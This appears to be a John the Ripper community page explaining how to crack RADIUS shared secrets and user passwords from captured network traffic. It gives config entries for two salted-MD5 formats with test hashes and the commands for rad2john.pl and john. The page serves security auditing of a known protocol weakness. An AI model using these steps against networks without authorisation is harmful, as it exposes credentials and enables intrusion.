The RADIUS protocol is using a shared secret between each client and the RADIUS server for two purposes: protecting user passwords and authentication of the RADIUS server replies. This is based on MD5 with a salt.
The attached perl script is implementing two attacks as discussed in An Analysis of the RADIUS Authentication Protocol, by Joshua Hill.
To use this script, you will need john-1.7.9 with all the patches up to 0043-dynamic-salt-rewrite.
john will need to be configured so that dynamic_1008 implements md5($p.$s), and dynamic_1009 does md5($s.$p). Below are the changes to make to dynamic.conf to implemnt these formats:
#################################################################### # Dynamic type for algorithm used in RADIUS User-Password attrinute md5($p.$s) #################################################################### [List.Generic:dynamic_1008] # expression shown will be this string: Expression=md5($p.$s) [RADIUS User-Password] # Flag needed here, is Salt Flag=MGF_SALTED # The salt has a fixed length of 16 bytes Saltlen=16 Func=DynamicFunc__clean_input Func=DynamicFunc__append_keys Func=DynamicFunc__append_salt Func=DynamicFunc__crypt Test=$dynamic_1008$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret Test=$dynamic_1008$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret Test=$dynamic_1008$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret Test=$dynamic_1008$7fe3c4d1bf2ac68e94ee9f2bf75b9601$HEX$00000000000000000000000000000000:secret Test=$dynamic_1008$658bbf9f04538d6bede09a4a52a77504$HEX$626c6168003637383930313233343536:secret
###################################################################### # Dynamic Type for algorithm used in RADIUS Responses md5($s.$p) ###################################################################### [List.Generic:dynamic_1009] Expression=md5($s.$p) [RADIUS Responses] Flag=MGF_SALTED Func=DynamicFunc__clean_input Func=DynamicFunc__append_salt Func=DynamicFunc__append_keys Func=DynamicFunc__crypt Test=$dynamic_1009$0b9b9fdf75fc79d85c5b69aa1de26288$Salt:test1
You will need to:
When you have obtained packet capture files; you will need to change the perl script source file to tell which login(s) you have used in 1) ; and launch the perl script, by giving the capture file(s) in argument, and redirect its output in a file:
perl rad2john.pl capture1.cap capture2.cap ... >radius.john
It will extract information from the capture files, and dump it in dynamic_1008 and dynamic_1009 format, depending if the login found is known. By default, it will only dump one line per client machine viewed, but this is also configurable (see the perl script file).
You can then launch john with the result file, using
john --format=dynamic_1008 radius.john
or
john --format=dynamic_1009 radius.john
depending on which attack you are interested in. You can of course add options to implement specific bruteforce schemes.
Back to advanced usage examples, John the Ripper user community resources